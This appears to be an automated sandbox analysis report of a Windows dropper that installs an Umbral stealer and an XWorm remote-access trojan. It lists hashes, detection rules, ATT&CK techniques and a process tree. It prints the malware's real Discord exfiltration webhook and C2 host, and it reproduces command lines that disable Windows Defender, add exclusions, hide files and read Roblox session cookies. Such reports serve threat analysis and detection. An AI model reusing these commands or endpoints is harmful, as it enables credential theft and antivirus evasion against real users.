umbral | 073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce

Analysis

max time kernel
148s
max time network
135s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
17-11-2024 01:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe
Size

800KB
MD5

7198fa10a50ea9aaf6ae5c2a05af2104
SHA1

c35a2a73313e3c5ad08136e3bc583bb9bc26964c
SHA256

073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce
SHA512

56db894671d6b5e093ef2de88ba785f1d9159e2b206593886ad540d336c5dfa79cd5ea7b6b29fbdd39d3a2355bcc01d90f5fff64e97fcbda383e38df79353acf
SSDEEP

12288:naMgC/rJdxLDMVVV/1EIEm6l6O6+26AFxKxg0YZbs7Ql:naMgGfxLDmVwoV+26YcY+0

Score

10^/10

umbral xworm discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1303474825066446879/NebQ1EAeNBTUfzGkn_W4tnvKCl9pOSQ87UqZdaxri0p165SfLuSuU_8R57ng1lqsCx6o

Extracted

Family

xworm

127.0.0.1:26848

23.ip.gl.ply.gg:26848

Attributes

Install_directory
%Userprofile%
install_file
Windows Security Host.exe

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0003000000013d08-7.dat	family_umbral
behavioral1/memory/2596-10-0x00000000009C0000-0x0000000000A00000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000e000000015cbd-14.dat	family_xworm
behavioral1/memory/2140-16-0x0000000000800000-0x000000000081A000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2748	powershell.exe
2856	powershell.exe
1956	powershell.exe
2496	powershell.exe
2120	powershell.exe
1688	powershell.exe
2440	powershell.exe
2104	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk	Windows Security Host.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk	Windows Security Host.exe

Executes dropped EXE 4 IoCs

pid	Process
2596	Injector.exe
2140	Windows Security Host.exe
2648	BootstrapperV1.23.exe
1208	Process not Found

Loads dropped DLL 7 IoCs

pid	Process
2060	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe
2732	Process not Found
888	WerFault.exe
888	WerFault.exe
888	WerFault.exe
888	WerFault.exe
888	WerFault.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security Host = "C:\\Users\\Admin\\Windows Security Host.exe"	Windows Security Host.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
18	discord.com
19	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2932	cmd.exe
2024	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2636	wmic.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2780	ipconfig.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2024	PING.EXE

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
2748	powershell.exe
2596	Injector.exe
2856	powershell.exe
1956	powershell.exe
2496	powershell.exe
2104	powershell.exe
2120	powershell.exe
1688	powershell.exe
2988	powershell.exe
2140	Windows Security Host.exe
2440	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2140	Windows Security Host.exe
Token: SeDebugPrivilege	2596	Injector.exe
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeIncreaseQuotaPrivilege	480	WMIC.exe
Token: SeSecurityPrivilege	480	WMIC.exe
Token: SeTakeOwnershipPrivilege	480	WMIC.exe
Token: SeLoadDriverPrivilege	480	WMIC.exe
Token: SeSystemProfilePrivilege	480	WMIC.exe
Token: SeSystemtimePrivilege	480	WMIC.exe
Token: SeProfSingleProcessPrivilege	480	WMIC.exe
Token: SeIncBasePriorityPrivilege	480	WMIC.exe
Token: SeCreatePagefilePrivilege	480	WMIC.exe
Token: SeBackupPrivilege	480	WMIC.exe
Token: SeRestorePrivilege	480	WMIC.exe
Token: SeShutdownPrivilege	480	WMIC.exe
Token: SeDebugPrivilege	480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	480	WMIC.exe
Token: SeRemoteShutdownPrivilege	480	WMIC.exe
Token: SeUndockPrivilege	480	WMIC.exe
Token: SeManageVolumePrivilege	480	WMIC.exe
Token: 33	480	WMIC.exe
Token: 34	480	WMIC.exe
Token: 35	480	WMIC.exe
Token: SeIncreaseQuotaPrivilege	480	WMIC.exe
Token: SeSecurityPrivilege	480	WMIC.exe
Token: SeTakeOwnershipPrivilege	480	WMIC.exe
Token: SeLoadDriverPrivilege	480	WMIC.exe
Token: SeSystemProfilePrivilege	480	WMIC.exe
Token: SeSystemtimePrivilege	480	WMIC.exe
Token: SeProfSingleProcessPrivilege	480	WMIC.exe
Token: SeIncBasePriorityPrivilege	480	WMIC.exe
Token: SeCreatePagefilePrivilege	480	WMIC.exe
Token: SeBackupPrivilege	480	WMIC.exe
Token: SeRestorePrivilege	480	WMIC.exe
Token: SeShutdownPrivilege	480	WMIC.exe
Token: SeDebugPrivilege	480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	480	WMIC.exe
Token: SeRemoteShutdownPrivilege	480	WMIC.exe
Token: SeUndockPrivilege	480	WMIC.exe
Token: SeManageVolumePrivilege	480	WMIC.exe
Token: 33	480	WMIC.exe
Token: 34	480	WMIC.exe
Token: 35	480	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1440	wmic.exe
Token: SeSecurityPrivilege	1440	wmic.exe
Token: SeTakeOwnershipPrivilege	1440	wmic.exe
Token: SeLoadDriverPrivilege	1440	wmic.exe
Token: SeSystemProfilePrivilege	1440	wmic.exe
Token: SeSystemtimePrivilege	1440	wmic.exe
Token: SeProfSingleProcessPrivilege	1440	wmic.exe
Token: SeIncBasePriorityPrivilege	1440	wmic.exe
Token: SeCreatePagefilePrivilege	1440	wmic.exe
Token: SeBackupPrivilege	1440	wmic.exe
Token: SeRestorePrivilege	1440	wmic.exe
Token: SeShutdownPrivilege	1440	wmic.exe
Token: SeDebugPrivilege	1440	wmic.exe
Token: SeSystemEnvironmentPrivilege	1440	wmic.exe
Token: SeRemoteShutdownPrivilege	1440	wmic.exe
Token: SeUndockPrivilege	1440	wmic.exe
Token: SeManageVolumePrivilege	1440	wmic.exe
Token: 33	1440	wmic.exe
Token: 34	1440	wmic.exe
Token: 35	1440	wmic.exe
Token: SeIncreaseQuotaPrivilege	1440	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2140	Windows Security Host.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2060 wrote to memory of 2596	2060	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	31
PID 2060 wrote to memory of 2596	2060	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	31
PID 2060 wrote to memory of 2596	2060	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	31
PID 2060 wrote to memory of 2140	2060	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	32
PID 2060 wrote to memory of 2140	2060	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	32
PID 2060 wrote to memory of 2140	2060	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	32
PID 2060 wrote to memory of 2648	2060	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	33
PID 2060 wrote to memory of 2648	2060	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	33
PID 2060 wrote to memory of 2648	2060	073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe	33
PID 2648 wrote to memory of 2796	2648	BootstrapperV1.23.exe	35
PID 2648 wrote to memory of 2796	2648	BootstrapperV1.23.exe	35
PID 2648 wrote to memory of 2796	2648	BootstrapperV1.23.exe	35
PID 2796 wrote to memory of 2780	2796	cmd.exe	37
PID 2796 wrote to memory of 2780	2796	cmd.exe	37
PID 2796 wrote to memory of 2780	2796	cmd.exe	37
PID 2140 wrote to memory of 2748	2140	Windows Security Host.exe	38
PID 2140 wrote to memory of 2748	2140	Windows Security Host.exe	38
PID 2140 wrote to memory of 2748	2140	Windows Security Host.exe	38
PID 2648 wrote to memory of 3032	2648	BootstrapperV1.23.exe	40
PID 2648 wrote to memory of 3032	2648	BootstrapperV1.23.exe	40
PID 2648 wrote to memory of 3032	2648	BootstrapperV1.23.exe	40
PID 3032 wrote to memory of 480	3032	cmd.exe	42
PID 3032 wrote to memory of 480	3032	cmd.exe	42
PID 3032 wrote to memory of 480	3032	cmd.exe	42
PID 2596 wrote to memory of 1440	2596	Injector.exe	44
PID 2596 wrote to memory of 1440	2596	Injector.exe	44
PID 2596 wrote to memory of 1440	2596	Injector.exe	44
PID 2140 wrote to memory of 2856	2140	Windows Security Host.exe	46
PID 2140 wrote to memory of 2856	2140	Windows Security Host.exe	46
PID 2140 wrote to memory of 2856	2140	Windows Security Host.exe	46
PID 2596 wrote to memory of 1372	2596	Injector.exe	48
PID 2596 wrote to memory of 1372	2596	Injector.exe	48
PID 2596 wrote to memory of 1372	2596	Injector.exe	48
PID 2596 wrote to memory of 1956	2596	Injector.exe	50
PID 2596 wrote to memory of 1956	2596	Injector.exe	50
PID 2596 wrote to memory of 1956	2596	Injector.exe	50
PID 2140 wrote to memory of 2496	2140	Windows Security Host.exe	52
PID 2140 wrote to memory of 2496	2140	Windows Security Host.exe	52
PID 2140 wrote to memory of 2496	2140	Windows Security Host.exe	52
PID 2596 wrote to memory of 2104	2596	Injector.exe	54
PID 2596 wrote to memory of 2104	2596	Injector.exe	54
PID 2596 wrote to memory of 2104	2596	Injector.exe	54
PID 2140 wrote to memory of 2120	2140	Windows Security Host.exe	56
PID 2140 wrote to memory of 2120	2140	Windows Security Host.exe	56
PID 2140 wrote to memory of 2120	2140	Windows Security Host.exe	56
PID 2596 wrote to memory of 1688	2596	Injector.exe	58
PID 2596 wrote to memory of 1688	2596	Injector.exe	58
PID 2596 wrote to memory of 1688	2596	Injector.exe	58
PID 2596 wrote to memory of 2988	2596	Injector.exe	60
PID 2596 wrote to memory of 2988	2596	Injector.exe	60
PID 2596 wrote to memory of 2988	2596	Injector.exe	60
PID 2648 wrote to memory of 888	2648	BootstrapperV1.23.exe	62
PID 2648 wrote to memory of 888	2648	BootstrapperV1.23.exe	62
PID 2648 wrote to memory of 888	2648	BootstrapperV1.23.exe	62
PID 2596 wrote to memory of 2076	2596	Injector.exe	63
PID 2596 wrote to memory of 2076	2596	Injector.exe	63
PID 2596 wrote to memory of 2076	2596	Injector.exe	63
PID 2596 wrote to memory of 308	2596	Injector.exe	65
PID 2596 wrote to memory of 308	2596	Injector.exe	65
PID 2596 wrote to memory of 308	2596	Injector.exe	65
PID 2596 wrote to memory of 588	2596	Injector.exe	67
PID 2596 wrote to memory of 588	2596	Injector.exe	67
PID 2596 wrote to memory of 588	2596	Injector.exe	67
PID 2596 wrote to memory of 2440	2596	Injector.exe	69

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1372	attrib.exe

C:\Users\Admin\AppData\Local\Temp\073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe
"C:\Users\Admin\AppData\Local\Temp\073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2060
- C:\Users\Admin\AppData\Local\Temp\Injector.exe
  "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2596
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1440
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
    3⤵
    - Views/modifies file attributes
    PID:1372
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1688
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2988
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:2076
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:308
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:588
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2440
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2636
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2932
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2024
- C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
  "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2140
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2856
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows Security Host.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2496
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2120
- C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
  "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Windows\system32\cmd.exe
    "cmd" /c ipconfig /all
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2796
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /all
      4⤵
      Gathers network information
      PID:2780
- - C:\Windows\system32\cmd.exe
    "cmd" /c wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3032
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nicconfig where (IPEnabled=TRUE) call SetDNSServerSearchOrder ("1.1.1.1", "1.0.0.1")
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:480
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2648 -s 1128
    3⤵
    - Loads dropped DLL
    PID:888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Injector.exe

Filesize
229KB

MD5
3882cfe50e35985982e9ef0c01b99c47

SHA1
6e09c71ae230b839163628c9179b3a3aac58c1a3

SHA256
da73db144e8035dd81ab4578b7f856131351ec33119c9ce0c46d852499621636

SHA512
a539767dc599b8a6103c413b4a42c83c7ce09d3171c45890f2630ad000166854c5ac220f78ab966ea90c55c1d6361ce70ea5ab3671fc2913445e8009126a534e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe

Filesize
79KB

MD5
c7ba63ce2ed6d0aab93ad839e0eddd68

SHA1
087ffd969b37a73b349a81af18bb51191eb42cbd

SHA256
84be55fb4b514ebdb999b5caf4e0837c521b5e7a4f85f636e4593daf09eedae9

SHA512
9f63cfdb94af23cebc85ffd491364c1a90ab90736fc8da0fe16ebf2fb18e9a6eb8fea4dfca87d8353565ba684b0c8f461371588aac72101b355886619bf672f6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VPS8MQ620F1LEX6XD4EY.temp

Filesize
7KB

MD5
dbb438c96f94d6e132a6c3379606de5f

SHA1
96550b3a19fc60169b2892a9f79c12911aae3642

SHA256
bb19fd1c8e6702a2a7500f1ac35ad79b50e043bc68ceadb4c7909c497f7a3f5e

SHA512
fd8ce420655b8c1829d7f83c9dda49048a047fd198e55e69e0cf2efb2e451dc95f895c8f23dfb590383d59b6ba10e55f86a8721251c651b88f5b67ad1d0afe89

Download Submit
\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe

Filesize
800KB

MD5
02c70d9d6696950c198db93b7f6a835e

SHA1
30231a467a49cc37768eea0f55f4bea1cbfb48e2

SHA256
8f2e28588f2303bd8d7a9b0c3ff6a9cb16fa93f8ddc9c5e0666a8c12d6880ee3

SHA512
431d9b9918553bff4f4a5bc2a5e7b7015f8ad0e2d390bb4d5264d08983372424156524ef5587b24b67d1226856fc630aaca08edc8113097e0094501b4f08efeb

Download Submit
memory/2060-1-0x0000000000170000-0x00000000001E2000-memory.dmp

Filesize
456KB

Download
memory/2060-9-0x000007FEF5D30000-0x000007FEF671C000-memory.dmp

Filesize
9.9MB

Download
memory/2060-0-0x000007FEF5D33000-0x000007FEF5D34000-memory.dmp

Filesize
4KB

Download
memory/2060-23-0x000007FEF5D30000-0x000007FEF671C000-memory.dmp

Filesize
9.9MB

Download
memory/2140-16-0x0000000000800000-0x000000000081A000-memory.dmp

Filesize
104KB

Download
memory/2596-18-0x000007FEF5D30000-0x000007FEF671C000-memory.dmp

Filesize
9.9MB

Download
memory/2596-10-0x00000000009C0000-0x0000000000A00000-memory.dmp

Filesize
256KB

Download
memory/2596-88-0x000007FEF5D30000-0x000007FEF671C000-memory.dmp

Filesize
9.9MB

Download
memory/2596-103-0x000007FEF5D30000-0x000007FEF671C000-memory.dmp

Filesize
9.9MB

Download
memory/2648-24-0x0000000000270000-0x000000000033E000-memory.dmp

Filesize
824KB

Download
memory/2748-30-0x000000001B7B0000-0x000000001BA92000-memory.dmp

Filesize
2.9MB

Download
memory/2748-31-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/2856-37-0x000000001B560000-0x000000001B842000-memory.dmp

Filesize
2.9MB

Download
memory/2856-38-0x0000000001DB0000-0x0000000001DB8000-memory.dmp

Filesize
32KB

Download